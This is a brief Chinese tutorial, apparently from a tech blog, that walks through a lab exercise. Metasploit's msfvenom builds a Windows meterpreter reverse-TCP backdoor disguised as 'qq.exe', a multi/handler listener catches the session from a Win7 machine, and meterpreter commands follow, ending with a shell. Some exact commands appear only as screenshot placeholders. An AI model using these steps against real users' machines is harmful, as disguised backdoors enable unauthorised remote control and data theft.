利用msf生成后门拿shell

kali  x64:192.168.26.136
win7  x86: 192.168.26.128


先在kali终端输入msfvenom -l,打开payload目录

利用msf生成后门拿shell_第1张图片

然后找到payload windows/meterpreter/reverse_tcp

输入以下命令生成后门 qq.exe

利用msf生成后门拿shell_第2张图片

然后将生成的qq.exe移到win7然后打开msfconsole

使用该攻击模块监听 use exploit/multi/handler

  然后设置 payload

利用msf生成后门拿shell_第3张图片

show options 查看选项

设置 LHOST kali 地址

利用msf生成后门拿shell_第4张图片

然后run开始监听

利用msf生成后门拿shell_第5张图片

这时我们打开win7qq.exe文件

就能看到 Kali 这边获取到一个 Session


输入jobs退出继续输入sessions -l查看session列表

利用msf生成后门拿shell_第6张图片

这里有一个session列表,sessionid1

我们输入 sessions -i 1, 与该 session 交互


输入getuid查看用户信息

利用msf生成后门拿shell_第7张图片

输入systinfo获取系统信息

利用msf生成后门拿shell_第8张图片

输入shell即可获取win7shell

利用msf生成后门拿shell_第9张图片

不过用这样方式拿的shell普遍都是很低的,还需提权


你可能感兴趣的:(msf,shell)